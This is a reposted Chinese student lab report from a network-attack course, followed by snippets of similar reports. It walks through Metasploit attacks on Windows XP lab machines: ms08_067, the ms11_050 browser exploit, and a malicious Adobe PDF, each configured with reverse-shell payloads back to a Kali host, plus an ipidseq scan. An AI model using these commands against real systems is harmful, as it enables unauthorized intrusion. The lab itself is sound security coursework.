20145219《网络对抗》MSF基础应用

最新推荐文章于 2024-08-08 17:43:45 发布
最新推荐文章于 2024-08-08 17:43:45 发布
阅读量90 收藏
点赞数
文章标签: shell 网络 操作系统
原文链接:http://www.cnblogs.com/20145219songge/p/6711409.html
版权

20145219《网络对抗》MSF基础应用

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

exploit:把实现设置好的东西送到要攻击的主机里。

payload:用来攻击的代码、程序等。

encode:编码方式,让被传输的东西变得更不易被发现。

实践过程记录

  • 靶机1:WinXPenSP3,IP地址:192.168.87.127
  • 靶机2:Windows XP Professional,IP地址:192.168.87.130
  • Kali IP地址:192.168.87.128

1、主动攻击:ms08_067

使用靶机1和Kali

search ms08_067查询一下针对该漏洞的攻击模块:
884666-20170415193308158-1271634149.png

use exploit/windows/smb/ms08_067_netapi使用该模块:
884666-20170415193439501-2031521228.png

show targets查看可以被攻击的靶机的操作系统型号:
884666-20170415193510142-1130001270.png

show payloads查看可以供我们使用的攻击载荷:
884666-20170415193520095-230531322.png

从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:
884666-20170415193535236-1312896353.png

show options查看需要设置的参数:
884666-20170415193624080-1566406893.png

这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:
884666-20170415193646361-1805968292.png

show options确认需要设置的参数是否已经设置好:
884666-20170415193754220-1914921752.png

确认参数设置无误后,用exploit指令开始攻击:
884666-20170415194132173-2061943100.png

攻击成功后会获取靶机的shell,可以对其进行操作:
884666-20170415194325876-1646400304.png

2、针对浏览器的攻击:ms11_050

使用靶机2和Kali

search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
884666-20170415194415126-971684240.png

info查看该模块的信息(这个指令相当于show targetsshow options等的集合版):

基本信息:
884666-20170415194434033-776277695.png

targets信息:
884666-20170415194500017-607975442.png

options信息:
884666-20170415194518595-345158760.png

set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

show options确认需要设置的参数是否已经设置好:
884666-20170415194633423-1246606846.png

确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
884666-20170415194725986-1146906093.png

在靶机IE上输入该网址:
884666-20170415194738048-373713311.png

kali中显示session 1已经创建,并显示其会话ID:
884666-20170415194904689-1761729619.png

输入sessions -i 1,成功获取靶机的shell,可以对其进行操作:
884666-20170415194943220-1115399072.png

884666-20170415195115548-1895022662.png

3、针对客户端的攻击:adobe_toolbutton

使用靶机1和Kali

search adobe查询一下针对该漏洞的攻击模块:
884666-20170415195129642-1426545047.png

选择一个模块并使用该模块:
884666-20170415195156814-1905772921.png

show targets查看可以被攻击的靶机的操作系统型号:
884666-20170415195230986-1756857781.png

选择可用的攻击载荷并设置好:
884666-20170415195207564-922917681.png

884666-20170415195251423-38325826.png

show options查看需要设置的参数:
884666-20170415195305986-1372017682.png

设置参数,并用show options确认需要设置的参数是否已经设置好:
884666-20170415195406345-1902990311.png

确认参数设置无误后,用exploit指令开始攻击,可以看到生成了一个设置好的pdf文件:
884666-20170415195501783-389548998.png

在文件夹中打开显示隐藏文件夹选项,找到生成的文件,并将其粘贴到靶机上:
884666-20170415195628923-375817589.png

设置监听模块(同前几次实验):
884666-20170415195721626-1477951496.png

在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
884666-20170415195831986-608817811.png

4、成功应用任何一个辅助模块:ipidseq

  • ipidseq

      功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

  拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为`Incremental!`的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

  TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

show auxiliary查看所有辅助模块,并选择其中的一个,我选的是scanner/ip/ipidseq
884666-20170415195916501-1800379055.png

查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。

这里可以进行对单一目标主机的扫描:
884666-20170415200433845-1509679891.png

884666-20170415200445814-143791515.png

也可以对指定网段的主机进行扫描:
884666-20170415200458798-67585115.png

884666-20170415200510361-339822982.png

实验总结与体会

这一次的实验我是先看老师和组长的过程学习使用etasploit的基本应用方式,然后按照这个模式去自己实践,先寻找可攻击的漏洞、再根据漏洞名和所属目录猜测漏洞攻击的方面、再查看漏洞的详细信息、在设置一系列参数、最后实施攻击并查看攻击结果。在这个实践过程中,因为有同学的提醒,让我少走了一些弯路,选择的靶机都很适合,攻击基本没有出现什么太大的问题。我的时间主要花费在第四步上,由于英文水平真的不太好,我做辅助模块的时候不太清楚攻击会产生什么具体现象(用百度搜索想找一些关于某个漏洞的具体介绍吧,还是英文的……求助线上翻译软件吧,那翻出来的东西真的是完全不能看,读起来都不是一句中国话),基本全靠猜……尝试了很多个漏洞,明确报错的只有一个,其他的都似乎是成功了,但是我看不懂也不太敢确认,最后,皇天不负苦心人!我终于找到一个用我的词汇量能看懂的漏洞——ipidseq!简直不能更高兴!经过这个实验吧,我觉得我还是去背单词吧……

转载于:https://www.cnblogs.com/20145219songge/p/6711409.html

weixin_30433075
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 361
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
20155305《网络对抗MSF基础应用
weixin_30827565的博客
04-14 169
20155305《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:19...
20155218《网络对抗MSF基础应用
04-17 126
20155218《网络对抗MSF基础应用 实验过程 1、一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞; show target 查看可以攻击的目标主机类型; show payloads查看可以选择的攻击载荷,看了一下其等级全为normal,从中找到一个可用的攻击载荷 generic/shell_reverse_tcp 用op...
20155304《网络对抗MSF基础应用
05-03 195
20155304《网络对抗MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 1.1主动攻击:ms08_067 使用靶机1和Kali 先...
20145327 《网络对抗MSF基础应用
dengnaxun1606的博客
04-15 127
20145327 《网络对抗MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ...
20155311《网络对抗MSF基础应用
weixin_30617695的博客
04-26 83
20155311《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.136.129 靶机2:Windows XP vivian SP3 简体中文,IP地址:192.168.136.130 Kali IP地址:192.168.136.128 1、主动攻击:ms08_067 •使用靶机1和Kali 先...
20155320《网络对抗MSF基础应用
weixin_30799995的博客
04-28 105
20155320《网络对抗MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作 payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击 enc...
20155307《网络对抗MSF基础应用
weixin_30505225的博客
05-02 122
实验过程 实验系统 所需设备: 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.128 靶机2:Windows XP Professional SP3 ,IP地址:192.168.1.133 ~ windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:192.168.1.115 1、主动攻击...
20145322 《网络对抗MSF基础应用1
04-17 126
20145322何志威 Exp5 MS08_067漏洞测试 实验问答 什么是exploit、payload、encode exploit:通过一个漏洞对程序进行攻击的过程 payload:有具体功能作用的代码 encode:对payload进行伪装 实验链接 实验一MS08_067漏洞测试 实验二MS11_050 实验三Adobe阅读...
通信与网络中的MSF基于组件的业务框架
11-14
**MSF基于组件的业务框架概述** ...总结来说,MSF基于组件的业务框架提供了一种结构化的方法来设计和实施通信与网络服务,通过模块化和标准化,使得业务开发更加高效,同时也为未来的业务创新和升级提供了强大的基础
msf简单运用基础
12-16
文中通过ping命令验证了网络连通性,这是进行后续渗透测试的基础。 ### 二、MSF框架的初步使用 #### 1. 扫描目标系统 - **db_nmap**: 这是MSF中调用Nmap工具的一种方式,用于获取目标主机的操作系统类型、开放端口...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
UnixBench分数计算与多进程测试
qq_39280836的博客
08-08 187
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 891
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
shell编程练习(三)
最新发布
2301_77279557的博客
08-08 241
常见的shell编程以及自动化脚本
DC-7靶机渗透测试
m0_66225311的博客
08-06 819
依旧是远古靶机,尝试又做了一做,用了一些不同样的方法将其再次攻破,这次主要学习了一下Drush 命令,用于重置 Drupal 网站中特定用户(通常是管理员用户)的密码为指定的新密码。这个获取后台登陆密码的方式太过新奇了,不好好查询资料,即使好好查或许也不一定能查得到。记住了这个知识点了,万一域渗透就用到了呢,用户横向移动到另外一台靶机,发现就是Drupal 网站,直接重置密码。查看文件也能获取一些定时任务的蛛丝马迹。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值